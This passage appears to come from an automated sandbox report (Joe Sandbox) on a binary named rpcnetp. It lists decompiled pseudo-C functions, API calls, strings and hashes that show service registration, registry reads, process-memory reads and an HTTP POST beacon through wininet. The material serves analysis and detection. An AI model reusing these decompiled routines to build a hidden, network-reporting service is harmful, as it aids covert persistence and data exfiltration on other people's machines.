								wsprintfA( &_v44, "%s: 0\r\n", "TagId");
								_t44 = _t55[7](_t55[2],  &_v44, 0xffffffff, 0, 0);
								asm("sbb eax, eax");
								_t35 = ( ~_t44 & 0x00000002) - 1;
								goto L14;
							}
						}
						goto L12;
					}
					FreeLibrary(_t55[0xd]);
					_t55[0xd] = 0;
					_t35 = 0;
					goto L14;
				}
				return _t31 | 0xffffffff;
			}

0x00a12d8c
0x00a12d93
0x00a12d9a
0x00a12da0
0x00a12da5
0x00a12daa
0x00a12db4
0x00a12db8
0x00a12dbb
0x00a12dbd
0x00a12dbd
0x00a12dc6
0x00a12dcf
0x00a12dd3
0x00000000
0x00000000
0x00a12dd5
0x00a12dd9
0x00a12ddf
0x00000000
0x00000000
0x00a12dea
0x00a12ded
0x00a12df1
0x00a12e4e
0x00a12e4e
0x00a12e9a
0x00000000
0x00a12e9a
0x00a12df6
0x00a12e10
0x00a12e13
0x00a12e15
0x00a12df8
0x00a12df8
0x00a12df8
0x00a12e2a
0x00a12e2d
0x00a12e32
0x00a12e44
0x00a12e47
0x00a12e4c
0x00a12e5c
0x00a12e6a
0x00a12e7b
0x00a12e8f
0x00a12e94
0x00a12e99
0x00000000
0x00a12e99
0x00a12e4c
0x00000000
0x00a12e32
0x00a12e00
0x00a12e06
0x00a12e09
0x00000000
0x00a12e09
0x00000000

APIs

LoadLibraryA.KERNEL32(wininet.dll), ref: 00A12D9A
GetProcAddress.KERNEL32(?,00A11324), ref: 00A12DC6

Strings

%s: 0, xrefs: 00A12E75
N, xrefs: 00A12D8C
Mozilla/4.0 (compatible; MSIE 7.0;), xrefs: 00A12DE5
POST, xrefs: 00A12E3E
TagId, xrefs: 00A12E6D
wininet.dll, xrefs: 00A12D87

Memory Dump Source

Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: N$%s: 0$Mozilla/4.0 (compatible; MSIE 7.0;)$POST$TagId$wininet.dll
API String ID: 2574300362-1135021940
Opcode ID: 1f006786011ed46a069ffaf2a68cc34df7a598c70686d4edca63fcc9195deee3
Instruction ID: d299126795d9901d4a0bf5278818a5f86450b3b4989ad15f9af825405fd6ac61
Opcode Fuzzy Hash: 1f006786011ed46a069ffaf2a68cc34df7a598c70686d4edca63fcc9195deee3
Instruction Fuzzy Hash: 4D316FB1500608BFDB209FA0CD89EEBBFB9FF08755B104929F656D6590D370ED948B60

Uniqueness

Uniqueness Score: -1.00%

Function 72B232DE, Relevance: 18.1, APIs: 12, Instructions: 107
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E72B232DE() {
				void* _v8;
				void* _v12;
				long _v16;
				long _t11;
				signed int _t14;
				void* _t18;
				void* _t20;
				intOrPtr _t26;
				signed int _t30;
				int _t33;
				void* _t34;
				void* _t35;
				void* _t36;
				void* _t38;

				_t11 = GetVersion();
				_t33 = 0;
				 *0x72b260b0 = _t11;
				if( *0x72b2608c == 0 && _t11 < 0) {
					 *0x72b26038 =  *0x72b26038 | 0xffffffff;
				}
				_v8 = GetStdHandle(0xfffffff4);
				_t38 = E72B23420(_t12);
				if(_t38 == _t33) {
					L11:
					_t14 =  *0x72b26038;
					__eflags = _t14 - _t33;
					if(_t14 != _t33) {
						__eflags = _t14 - 2;
						if(_t14 == 2) {
							goto L23;
						}
						__eflags = _t38 - _t33;
						if(_t38 != _t33) {
							L17:
							 *0x72b260ac = CreateEventA(_t33, _t33, _t33, _t33);
							L18:
							_t18 = CreateThread(_t33, _t33, E72B23161, _t33, _t33,  &_v16);
							_v12 = _t18;
							__eflags = _t18 - _t33;
							if(_t18 != _t33) {
								_t20 =  *0x72b260ac;
								__eflags = _t20 - _t33;
								if(_t20 != _t33) {
									WaitForSingleObject(_t20, 0xffffffff);
									CloseHandle( *0x72b260ac);
									 *0x72b260ac = _t33;
								}
								WaitForSingleObject(_v12, 0xffffffff);
								CloseHandle(_v12);
							}
							E72B22FBB(_t35, _t33);
							goto L23;
						}
						__eflags = _t14 - 0xffffffff;
						if(_t14 != 0xffffffff) {
							goto L18;
						}
						goto L17;
					}
					__eflags = _t38 - _t33;
					if(_t38 != _t33) {
						goto L17;
					}
					E72B21EDA();
					goto L23;
				} else {
					_t26 =  *0x72b26008;
					 *0x72b26004 = _t33;
					_t46 =  *((intOrPtr*)(_t26 + 0x28)) - _t33;
					if( *((intOrPtr*)(_t26 + 0x28)) != _t33) {
						 *0x72b26038 = 1;
						SetStdHandle(0xfffffff6, _v8);
						goto L11;
					}
					 *0x72b26038 = 2;
					_t34 = E72B22123(_t33, _t36, CloseHandle, _t38, _t46);
					 *( *0x72b26008 + 0x28) = 1;
					_t30 = E72B22ADB(_t34, _t35, _t36, CloseHandle, _t38, _t46, _t34);
					asm("sbb esi, esi");
					_t38 =  ~_t30 + 1;
					if(_t34 != 0) {
						CloseHandle(_t34);
					}
					if(_t38 != 0) {
						_t33 = 0;
						__eflags = 0;
						goto L11;
					} else {
						E72B22FBB(_t35, _t38);
						_t33 = 0;
						L23:
						if(_v8 != _t33) {
							CloseHandle(_v8);
						}
						ExitProcess(_t33);
					}
				}
			}

0x72b232e7
0x72b232ed
0x72b232ef
0x72b232fa
0x72b23300
0x72b23300
0x72b23310
0x72b2331e
0x72b23322
0x72b2338f
0x72b2338f
0x72b23394
0x72b23396
0x72b233a3
0x72b233a6
0x00000000
0x00000000
0x72b233a8
0x72b233aa
0x72b233b1
0x72b233bb
0x72b233c0
0x72b233cd
0x72b233d3
0x72b233d6
0x72b233d8
0x72b233da
0x72b233e5
0x72b233e7
0x72b233ec
0x72b233f4
0x72b233f6
0x72b233f6
0x72b23401
0x72b23406
0x72b23406
0x72b23409
0x00000000
0x72b23409
0x72b233ac
0x72b233af
0x00000000
0x00000000
0x00000000
0x72b233af
0x72b23398
0x72b2339a
0x00000000
0x00000000
0x72b2339c
0x00000000
0x72b23324
0x72b23324
0x72b23329
0x72b2332f
0x72b23332
0x72b23379
0x72b23385
0x00000000
0x72b23385
0x72b23334
0x72b23343
0x72b2334b
0x72b23352
0x72b2335b
0x72b2335d
0x72b23360
0x72b23363
0x72b23363
0x72b23367
0x72b2338d
0x72b2338d
0x00000000
0x72b23369
0x72b2336a
0x72b2336f
0x72b2340e
0x72b23411
0x72b23416
0x72b23416
0x72b23419
0x72b23419
0x72b23367

APIs

GetVersion.KERNEL32 ref: 72B232E7
GetStdHandle.KERNEL32(000000F4), ref: 72B23309
CloseHandle.KERNEL32(00000000), ref: 72B23363
SetStdHandle.KERNEL32(000000F6,?,00000000), ref: 72B23385
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 72B233B5
CreateThread.KERNEL32(00000000,00000000,72B23161,00000000,00000000,?), ref: 72B233CD
WaitForSingleObject.KERNEL32(?,000000FF), ref: 72B233EC
CloseHandle.KERNEL32 ref: 72B233F4
WaitForSingleObject.KERNEL32(?,000000FF), ref: 72B23401
CloseHandle.KERNEL32(?), ref: 72B23406
CloseHandle.KERNEL32(?,00000000), ref: 72B23416
ExitProcess.KERNEL32 ref: 72B23419

Memory Dump Source

Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd

Similarity

API ID: Handle$Close$CreateObjectSingleWait$EventExitProcessThreadVersion
String ID:
API String ID: 2472693224-0
Opcode ID: 27bce71e7147c629c4f655e00d6e1af80deb3abbae097ad88cdb8826969ffa36
Instruction ID: 016aedef878e6635e219e695dc34082c73d5b5be0daf8870531cd6c57efd487a
Opcode Fuzzy Hash: 27bce71e7147c629c4f655e00d6e1af80deb3abbae097ad88cdb8826969ffa36
Instruction Fuzzy Hash: 3A310072440314EFCB216F6ACDC4A4B3EF8DB443E67224A2DE51AE3152D7304D89DB54

Uniqueness

Uniqueness Score: -1.00%

Function 72B2351D, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 95
timewindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E72B2351D(void* __edx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagMSG _v32;
				void* __edi;
				void* __esi;
				int _t13;
				long _t17;
				void* _t18;
				void* _t20;
				void* _t23;
				_Unknown_base(*)()* _t31;
				void* _t34;
				void* _t35;
				struct HWND__* _t37;

				_t35 = __edx;
				_t37 = _a4;
				_t13 = _a8;
				_t31 = 0;
				if(_t13 == 0) {
					L17:
					KillTimer(_t37, 0x64);
					do {
					} while (PeekMessageA( &_v32, _t37, 0x113, 0x113, 1) != 0);
					PostQuitMessage(_t31);
					if(_a8 != 0x11) {
						L12:
						_t17 = 0;
						L21:
						return _t17;
					}
					L20:
					_t17 = DefWindowProcA(_t37, _a8, _a12, _a16);
					goto L21;
				}
				_t18 = _t13 - 0xf;
				if(_t18 == 0) {
					 *0x72b26088 = 1;
					 *0x72b2602c = _t31;
					 *0x72b260b8 = _t31;
					L11:
					if(E72B22EA1(_t34, _a16) == 0) {
						_t20 =  *0x72b260ac;
						if(_t20 != _t31) {
							 *0x72b26088 = 1;
							SetEvent(_t20);
						}
						if( *0x72b26088 != _t31) {
							goto L17;
						} else {
							SetTimer(_t37, 0x64, 0xdbba0, _t31);
							goto L12;
						}
					}
					goto L12;
				}
				_t23 = _t18 - 0x102;
				if(_t23 == 0) {
					if(_a12 != 0x64) {
						goto L20;
					}
					KillTimer(_t37, 0x64);
					do {
					} while (PeekMessageA( &_v32, _t37, 0x113, 0x113, 1) != 0);
					E72B2327B(_t34, _t35, _t37, 0x113);
					if( *0x72b26038 == 0) {
						SetTimer(_t37, 0x64, 0xdbba0, 0);
					}
					goto L20;
				}
				if(_t23 == 0x2ed) {
					goto L11;
				}
				goto L20;
			}

0x72b2351d
0x72b23529
0x72b2352d
0x72b23530
0x72b23531
0x72b235f4
0x72b235f7
0x72b23602
0x72b23611
0x72b23616
0x72b23620
0x72b235c0
0x72b235c0
0x72b23632
0x72b23636
0x72b23636
0x72b23622
0x72b2362c
0x00000000
0x72b2362c
0x72b23537
0x72b2353a
0x72b235a1
0x72b235a8
0x72b235ae
0x72b235b4
0x72b235be
0x72b235c4
0x72b235cb
0x72b235ce
0x72b235d5
0x72b235d5
0x72b235e1
0x00000000
0x72b235e3
0x72b235ec
0x00000000
0x72b235ec
0x72b235e1
0x00000000
0x72b235be
0x72b2353c
0x72b23541
0x72b23553
0x00000000
0x00000000
0x72b2355c
0x72b23567
0x72b23576
0x72b2357a
0x72b23587
0x72b23596
0x72b23596
0x00000000
0x72b23587
0x72b23548
0x00000000
0x00000000
0x00000000

APIs

KillTimer.USER32(?,00000064), ref: 72B2355C
PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 72B23570
SetTimer.USER32(?,00000064,000DBBA0,00000000), ref: 72B23596
SetEvent.KERNEL32(?), ref: 72B235D5
SetTimer.USER32(?,00000064,000DBBA0,00000000), ref: 72B235EC
KillTimer.USER32(?,00000064), ref: 72B235F7
PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 72B2360B
PostQuitMessage.USER32(00000000), ref: 72B23616
DefWindowProcA.USER32(?,00000011,?,?), ref: 72B2362C

Strings

d, xrefs: 72B2354F

Memory Dump Source

Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd

Similarity

API ID: Timer$Message$KillPeek$EventPostProcQuitWindow
String ID: d
API String ID: 2149785620-2564639436
Opcode ID: fd05adf9ae9d9919d0e2fb0a95bd43f856e1f6eacee9f1e3848e91cb9ea3ae03
Instruction ID: 41688d1bd847d3f0796b27d825ea33bda349e247ae9f5fafea2125377e32a201
Opcode Fuzzy Hash: fd05adf9ae9d9919d0e2fb0a95bd43f856e1f6eacee9f1e3848e91cb9ea3ae03
Instruction Fuzzy Hash: C731D132690314ABE7225A29CC8AF9B3AFDEB45797F11081CF50ED2183D3718558DB21

Uniqueness

Uniqueness Score: -1.00%

Function 72B2493C, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 124libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll), ref: 72B2495C
GetProcAddress.KERNEL32(00000000,CryptAcquireContextW), ref: 72B2497A
GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 72B24987
GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 72B24994
FreeLibrary.KERNEL32(?), ref: 72B249D8

Strings

CryptReleaseContext, xrefs: 72B24989
CryptAcquireContextW, xrefs: 72B24974
CryptGenRandom, xrefs: 72B2497C
advapi32.dll, xrefs: 72B24957

Memory Dump Source

Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 2449869053-171673395
Opcode ID: 76955d8ea82e5e10655fe380b2fa915008fff55a7b7e9bfcc91a957374e38f08
Instruction ID: da1224439bb4948f671e8665be7783c961a7690319e1cb8d5b89657dbbdfc4a5
Opcode Fuzzy Hash: 76955d8ea82e5e10655fe380b2fa915008fff55a7b7e9bfcc91a957374e38f08
Instruction Fuzzy Hash: 97415072900209AFDF12CF55CC84BDA7FB9EF85351F1481AABE09AF145D770A645CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A1493C, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 124libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll), ref: 00A1495C
GetProcAddress.KERNEL32(00000000,CryptAcquireContextW), ref: 00A1497A
GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00A14987
GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00A14994
FreeLibrary.KERNEL32(?), ref: 00A149D8

Strings

CryptAcquireContextW, xrefs: 00A14974
CryptReleaseContext, xrefs: 00A14989
advapi32.dll, xrefs: 00A14957
CryptGenRandom, xrefs: 00A1497C

Memory Dump Source

Source File: 00000006.00000002.937118666.0000000000A11000.00000020.00020000.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000006.00000002.937095794.0000000000A10000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.937179586.0000000000A17000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.937221221.0000000000A18000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_a10000_rpcnetp.jbxd

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 2449869053-171673395
Opcode ID: fce7c67911c0af0a7ec1a690a8e324b2b471ad477e0889dd8751a2e32e61a377
Instruction ID: f458583bd07675f1e8cab8fdf3ed999d331f07b1b1f506764321ee9456250a26
Opcode Fuzzy Hash: fce7c67911c0af0a7ec1a690a8e324b2b471ad477e0889dd8751a2e32e61a377
Instruction Fuzzy Hash: B3415E72900608BFDF11CF54CC85EDA7FB9EF49740F0480A6BE08AF155D6B0AA85CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 72B22658, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 81
synchronizationregistrythreadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E72B22658(void* __ecx) {
				void* _v8;
				long _v12;
				int _t6;
				void* _t11;
				struct HWND__* _t13;
				intOrPtr _t24;

				 *0x72b260a4 = CreateEventA(0, 1, 0, 0);
				 *0x72b26010 = 0x10;
				 *0x72b2601c = 0x42a;
				 *0x72b26020 = 1;
				_t6 = RegisterServiceCtrlHandlerA("rpcnet", E72B21EEB);
				 *0x72b260bc = _t6;
				if(_t6 != 0) {
					_push(0);
					_push(0x1388);
					_t24 = 2;
					_push(_t24);
					 *0x72b26018 = 1;
					E72B22266();
					 *0x72b26018 = 5;
					E72B22266(4, 0, 0);
					E72B22296();
					 *0x72b2601c = 0;
					 *0x72b26020 = 0;
					_t11 = CreateThread(0, 0, E72B23161, 0, 0,  &_v12);
					_v8 = _t11;
					if(_t11 != 0) {
						WaitForSingleObject( *0x72b260a4, 0xffffffff);
						_t13 =  *0x72b2600c;
						if(_t13 != 0) {
							PostMessageA(_t13, 0x11, 0, 0);
						}
						WaitForSingleObject(_v8, 0x7530);
						CloseHandle(_v8);
					} else {
						 *0x72b26020 = _t24;
					}
					CloseHandle( *0x72b260a4);
					_t6 = E72B22266(1, 0, 0);
				}
				return _t6;
			}

0x72b22678
0x72b2267d
0x72b22687
0x72b22691
0x72b22697
0x72b2269d
0x72b226a4
0x72b226ab
0x72b226ac
0x72b226b3
0x72b226b4
0x72b226b5
0x72b226bb
0x72b226c4
0x72b226ce
0x72b226d3
0x72b226e5
0x72b226eb
0x72b226f1
0x72b226f7
0x72b226fc
0x72b22714
0x72b22716
0x72b2271d
0x72b22724
0x72b22724
0x72b22732
0x72b22737
0x72b226fe
0x72b226fe
0x72b226fe
0x72b22743
0x72b2274c
0x72b22751
0x72b22755

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 72B22668
RegisterServiceCtrlHandlerA.ADVAPI32(rpcnet,72B21EEB), ref: 72B22697

Part of subcall function 72B22266: SetServiceStatus.ADVAPI32(72B26010,?,72B226C0,00000002,00001388,00000000), ref: 72B2228C

Part of subcall function 72B22296: RegOpenKeyA.ADVAPI32(80000002,System\CurrentControlSet\Services\rpcnetp,?), ref: 72B222B1
Part of subcall function 72B22296: RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,72B260C8,00000080,00000002,00000000,00000001), ref: 72B222CF
Part of subcall function 72B22296: RegEnumValueA.ADVAPI32 ref: 72B22300
Part of subcall function 72B22296: RegCloseKey.ADVAPI32(?), ref: 72B22309

CreateThread.KERNEL32(00000000,00000000,72B23161,00000000,00000000,?), ref: 72B226F1
WaitForSingleObject.KERNEL32(000000FF), ref: 72B22714
PostMessageA.USER32 ref: 72B22724
WaitForSingleObject.KERNEL32(?,00007530), ref: 72B22732
CloseHandle.KERNEL32(?), ref: 72B22737
CloseHandle.KERNEL32 ref: 72B22743

Strings

rpcnet, xrefs: 72B22673

Memory Dump Source

Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd

Similarity

API ID: Close$CreateHandleObjectServiceSingleValueWait$CtrlEnumEventHandlerMessageOpenPostQueryRegisterStatusThread
String ID: rpcnet
API String ID: 2965456292-717388198
Opcode ID: 6326df2ed4b094ffd8747898ea3af8264a0165ffc983375e096e12d1523c2ac5
Instruction ID: 02e831f8f98af63f743597e7f97a2177f381f5a52501a144112e9f4fabe84738
Opcode Fuzzy Hash: 6326df2ed4b094ffd8747898ea3af8264a0165ffc983375e096e12d1523c2ac5
Instruction Fuzzy Hash: 87216BB2591364BBD7315B5B8C88F9B3EE8FB497E2B22091DF209D7142C3740900EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 72B22314, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86
threadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E72B22314() {
				int _t49;
				void _t50;
				long _t52;
				void* _t54;
				void* _t57;
				void* _t58;
				void* _t61;
				void* _t62;
				void* _t64;
				void* _t66;
				void* _t67;

				_push(0xda4);
				_push(0x72b253c8);
				E72B24A94(_t57, _t61, _t64);
				 *(_t67 - 0x1c) =  *(_t67 - 0x1c) & 0x00000000;
				_t58 = GetStdHandle(0xfffffff4);
				 *(_t67 - 4) =  *(_t67 - 4) & 0x00000000;
				_t62 =  *(_t67 + 8);
				if(ReadProcessMemory(_t58, _t62, _t67 - 0x30, 0x10, _t67 - 0x34) == 0) {
					L16:
					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
					ExitThread( *(_t67 - 0x1c));
				}
				_t63 = _t62 -  *((intOrPtr*)(_t67 - 0x2c));
				if(ReadProcessMemory(_t58, _t62 -  *((intOrPtr*)(_t67 - 0x2c)), _t67 - 0x20, 4, _t67 - 0x34) == 0) {
					goto L16;
				}
				if( *(_t67 - 0x30) == 0x78 ||  *(_t67 - 0x30) == 0x1bc8) {
					__eflags =  *(_t67 - 0x24);
					if( *(_t67 - 0x24) == 0) {
						goto L15;
					}
					_t49 = ReadProcessMemory(_t58,  *(_t67 - 0x28), _t67 - 0xdb4,  *(_t67 - 0x24), _t67 - 0x34);
					__eflags = _t49;
					if(_t49 == 0) {
						goto L16;
					}
					_t50 =  *(_t67 - 0x30);
					_t59 =  *(_t67 - 0x20);
					_t66 = _t50 +  *(_t67 - 0x20);
					__eflags = _t50 - 0x78;
					if(_t50 == 0x78) {
						_t54 = 0xd80 -  *((intOrPtr*)(_t66 + 8));
						__eflags =  *(_t67 - 0x24) - 0xd80;
						if( *(_t67 - 0x24) > 0xd80) {
							_t59 =  *(_t67 - 0x24) - _t54;
							__eflags =  *(_t67 - 0x24) - _t54;
							E72B215CC(_t63,  *(_t67 - 0x24) - _t54, _t66, 0,  *(_t67 - 0x24) - _t54);
						}
					}
					_t52 = E72B2162F(_t58, _t59, _t66, _t67 - 0xdb4,  *(_t67 - 0x24));
					goto L8;
				} else {
					if( *(_t67 - 0x30) != 0x3708) {
						L15:
						 *(_t67 - 0x1c) = 1;
						 *( *(_t67 - 0x20) + 0x5c) =  *( *(_t67 - 0x20) + 0x5c) & 0x000000fb;
					} else {
						_push( *((intOrPtr*)( *(_t67 - 0x20) + 0x3708)));
						if( *(_t67 - 0x28) == 0) {
							_t52 = ResetEvent();
						} else {
							_t52 = SetEvent();
						}
						L8:
						 *(_t67 - 0x1c) = _t52;
					}
					goto L16;
				}
			}

0x72b22314
0x72b22319
0x72b2231e
0x72b22323
0x72b2232f
0x72b22331
0x72b2233f
0x72b2234e
0x72b2241b
0x72b2241b
0x72b22422
0x72b22422
0x72b2235e
0x72b22367
0x00000000
0x00000000
0x72b22371
0x72b223a7
0x72b223ab
0x00000000
0x00000000
0x72b223bf
0x72b223c1
0x72b223c3
0x00000000
0x00000000
0x72b223c5
0x72b223c8
0x72b223cb
0x72b223ce
0x72b223d1
0x72b223d8
0x72b223db
0x72b223de
0x72b223e3
0x72b223e3
0x72b223e9
0x72b223e9
0x72b223de
0x72b223f9
0x00000000
0x72b2237c
0x72b22383
0x72b22400
0x72b22400
0x72b2240a
0x72b22385
0x72b22388
0x72b22392
0x72b2239c
0x72b22394
0x72b22394
0x72b22394
0x72b223a2
0x72b223a2
0x72b223a2
0x00000000
0x72b22383

APIs

GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B22329
ReadProcessMemory.KERNEL32(00000000,?,?,00000010,?,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B2234A
ReadProcessMemory.KERNEL32(00000000,?,?,00000004,?,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B22363
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B22394
ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B2239C
ReadProcessMemory.KERNEL32(00000000,?,?,00000000,?), ref: 72B223BF
ExitThread.KERNEL32 ref: 72B22422

Strings

x, xrefs: 72B2236D

Memory Dump Source

Source File: 00000006.00000002.938126535.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000006.00000002.938088725.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.938169246.0000000072B27000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.938191585.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_72b20000_rpcnetp.jbxd

Similarity

API ID: MemoryProcessRead$Event$ExitHandleResetThread
String ID: x
API String ID: 2307309678-2363233923
Opcode ID: 1046eb34cbdf0b765d3cfa370b9ef56dd7c2329d757a53313fe159436fe1e0ad
Instruction ID: 39cbffadf330a72c51dfe75118ffe555f1184d41082d0e839d6b4843e77be50f
Opcode Fuzzy Hash: 1046eb34cbdf0b765d3cfa370b9ef56dd7c2329d757a53313fe159436fe1e0ad
Instruction Fuzzy Hash: 3E313A71910319EFEB11CBA9CE84EEEBBF9FB08316F104129E516F2091D774AA45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A12314, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86
threadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00A12314() {
				int _t49;
				void _t50;
				long _t52;
				void* _t54;
				void* _t57;
				void* _t58;
				void* _t61;
				void* _t62;
				void* _t64;
				void* _t66;
				void* _t67;

				_push(0xda4);
				_push(0xa153c8);
				E00A14A94(_t57, _t61, _t64);
				 *(_t67 - 0x1c) =  *(_t67 - 0x1c) & 0x00000000;
				_t58 = GetStdHandle(0xfffffff4);
				 *(_t67 - 4) =  *(_t67 - 4) & 0x00000000;
				_t62 =  *(_t67 + 8);
				if(ReadProcessMemory(_t58, _t62, _t67 - 0x30, 0x10, _t67 - 0x34) == 0) {
					L16:
					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
					ExitThread( *(_t67 - 0x1c));
				}
				_t63 = _t62 -  *((intOrPtr*)(_t67 - 0x2c));
				if(ReadProcessMemory(_t58, _t62 -  *((intOrPtr*)(_t67 - 0x2c)), _t67 - 0x20, 4, _t67 - 0x34) == 0) {
					goto L16;
				}
				if( *(_t67 - 0x30) == 0x78 ||  *(_t67 - 0x30) == 0x1bc8) {
					__eflags =  *(_t67 - 0x24);
					if( *(_t67 - 0x24) == 0) {
						goto L15;
					}
					_t49 = ReadProcessMemory(_t58,  *(_t67 - 0x28), _t67 - 0xdb4,  *(_t67 - 0x24), _t67 - 0x34);
					__eflags = _t49;
					if(_t49 == 0) {
						goto L16;
					}
					_t50 =  *(_t67 - 0x30);
					_t59 =  *(_t67 - 0x20);
					_t66 = _t50 +  *(_t67 - 0x20);
					__eflags = _t50 - 0x78;
					if(_t50 == 0x78) {
						_t54 = 0xd80 -  *((intOrPtr*)(_t66 + 8));
						__eflags =  *(_t67 - 0x24) - 0xd80;
						if( *(_t67 - 0x24) > 0xd80) {
							_t59 =  *(_t67 - 0x24) - _t54;
							__eflags =  *(_t67 - 0x24) - _t54;
							E00A115CC(_t63,  *(_t67 - 0x24) - _t54, _t66, 0,  *(_t67 - 0x24) - _t54);
						}
					}
					_t52 = E00A1162F(_t58, _t59, _t66, _t67 - 0xdb4,  *(_t67 - 0x24));
					goto L8;
				} else {
					if( *(_t67 - 0x30) != 0x3708) {
						L15:
						 *(_t67 - 0x1c) = 1;
						 *( *(_t67 - 0x20) + 0x5c) =  *( *(_t67 - 0x20) + 0x5c) & 0x000000fb;
					} else {
						_push( *((intOrPtr*)( *(_t67 - 0x20) + 0x3708)));
						if( *(_t67 - 0x28) == 0) {
							_t52 = ResetEvent();
						} else {
							_t52 = SetEvent();
						}
						L8:
						 *(_t67 - 0x1c) = _t52;
					}
					goto L16;
				}
			}

0x00a12314
0x00a12319
0x00a1231e
0x00a12323
0x00a1232f
0x00a12331
0x00a1233f
0x00a1234e
0x00a1241b
0x00a1241b
0x00a12422
0x00a12422
0x00a1235e
0x00a12367
0x00000000
0x00000000
0x00a12371
0x00a123a7
0x00a123ab
0x00000000
0x00000000
0x00a123bf
0x00a123c1
0x00a123c3
0x00000000
0x00000000
0x00a123c5
0x00a123c8
0x00a123cb
0x00a123ce
0x00a123d1
0x00a123d8
0x00a123db
0x00a123de
0x00a123e3
0x00a123e3
0x00a123e9
0x00a123e9
0x00a123de
0x00a123f9
0x00000000
0x00a1237c
0x00a12383
0x00a12400
0x00a12400
0x00a1240a
0x00a12385
0x00a12388
0x00a12392
0x00a1239c
0x00a12394
0x00a12394
0x00a12394
0x00a123a2
0x00a123a2
0x00a123a2
0x00000000
0x00a12383

APIs

GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,00A153C8,00000DA4), ref: 00A12329
